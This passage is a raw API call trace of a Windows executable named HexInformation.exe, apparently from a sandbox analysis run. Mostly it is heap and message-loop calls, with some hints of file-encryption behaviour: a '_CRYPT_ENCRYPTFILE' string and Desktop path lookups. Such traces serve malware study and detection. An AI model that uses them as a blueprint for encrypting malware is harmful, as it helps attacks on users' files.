lpString1="xInformation.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0174.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Information.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0174.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nformation.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0174.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="formation.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0174.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ormation.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0174.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rmation.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0174.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mation.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0174.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ation.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0174.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tion.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0174.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ion.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0174.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="on.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0174.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0174.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0174.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0174.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0174.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0174.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0174.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0174.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0174.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0174.957] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0174.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0174.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0174.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0174.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0174.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0174.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0174.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0174.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0174.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0174.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0174.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0174.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0174.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0174.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0174.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0174.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0174.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0174.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0174.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x26) returned 0x9778d8 [0174.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0174.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HexInformation.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0174.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exInformation.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0174.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xInformation.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0174.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Information.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0174.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nformation.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0174.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="formation.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0174.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ormation.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0174.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rmation.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0174.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mation.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0174.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ation.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0174.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tion.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0174.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ion.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0174.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="on.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0174.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0174.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0174.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0174.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0174.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0174.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0174.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0174.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0174.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0174.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0174.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0174.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0174.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0174.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0174.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0174.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0174.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0174.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0174.959] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0174.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0174.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0174.959] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0174.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0174.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0174.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0174.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0174.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0174.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0174.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0174.960] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0174.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0174.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0174.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0174.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0174.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0174.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0174.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0174.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0174.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0174.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0174.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0174.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0174.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0174.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0174.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0174.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0174.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0174.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0174.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0174.960] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0174.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0174.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0174.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0174.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0174.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0174.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0174.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0174.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0174.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0174.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0174.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0174.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0174.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0174.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0174.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0174.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0174.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0175.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0175.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0175.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53878 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0175.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0175.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0175.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0175.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0175.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0175.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0175.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0175.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0175.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0175.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0175.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0175.032] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0175.032] TranslateMessage (lpMsg=0x8cf708) returned 0 [0175.032] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0175.032] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0175.032] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0175.032] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0175.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0175.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0175.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0175.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0175.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0175.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0175.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0175.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0175.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0175.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0175.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0175.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0175.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0175.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0175.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0175.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0175.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0175.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0175.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0175.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0175.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0175.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0175.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0175.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0175.033] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0175.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0175.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0175.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0175.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0175.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0175.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0175.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0175.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0175.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0175.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0175.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0175.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0175.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0175.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0175.035] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0175.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0175.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0175.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0175.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0175.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0175.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0175.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0175.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0175.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0175.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0175.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0175.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0175.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0175.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0175.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0175.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0175.036] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0175.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0175.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0175.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0175.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0175.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 